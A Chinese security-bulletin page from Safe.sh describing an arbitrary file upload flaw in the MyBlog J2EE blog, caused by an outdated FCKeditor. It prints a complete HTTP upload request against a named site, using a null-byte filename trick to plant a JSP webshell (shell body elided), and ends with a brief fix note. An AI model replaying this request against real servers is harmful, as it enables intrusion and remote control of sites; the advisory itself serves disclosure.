中文(Chinese) 英文(English) Tel: 4006-858-981           Msn: China@Safe.sh         QQ: 7387526       Server Hosting        加入收藏
主页 >> 安全风向标 >> 漏洞播报
安全风向标
分类
MyBlog存在文件任意上传漏洞
影响版本:

MyBlog

漏洞描述:

MyBlog是一个J2ee的开源自建blog系统,攻击者通过他的一些组件问题,可以上传任意文件。

由于使用了早期版本的fckeditor。导致可以通过文件名截断,绕过后缀名验证,上传任意文件。

提交如下http包,即可上传shell
http://jdkcn.com/upload/Image/b.jsp

POST /FCK/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F HTTP/1.1

Accept: */*

Accept-Language: en-US,zh-cn;q=0.5

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

Content-Type: multipart/form-data; boundary=---------------------------7d9cb26524ee

Host: jdkcn.com

Content-Length: xxxxxx

Cache-Control: no-cache



-----------------------------7d9cb26524ee

Content-Disposition: form-data; name="NewFile"; filename="b.jsp(此处为null字符).jpg"

Content-Type: text/plain



<%@ page contentType="text/html; charset=GBK" %>

<%@ page import="java.io.*"%>

<%@ page import="java.nio.charset.Charset"%>

<%@ page import="java.util.regex.*"%>

..........

.......

......

...

-----------------------------7d9cb26524ee--

<*参考
http://www.wooyun.org/bugs/wooyun-2010-02012
*>

Safe.sh安全建议:
临时解决办法:

修复fckeditor组件
页面工具 打印 | 电子邮件 | 评价
关于我们 | | 沪ICP备12021423号-1 | 联系我们 友情链接 | 站点地图 | 隐私 | 法律 | Copyright © 2018 Safe.Sh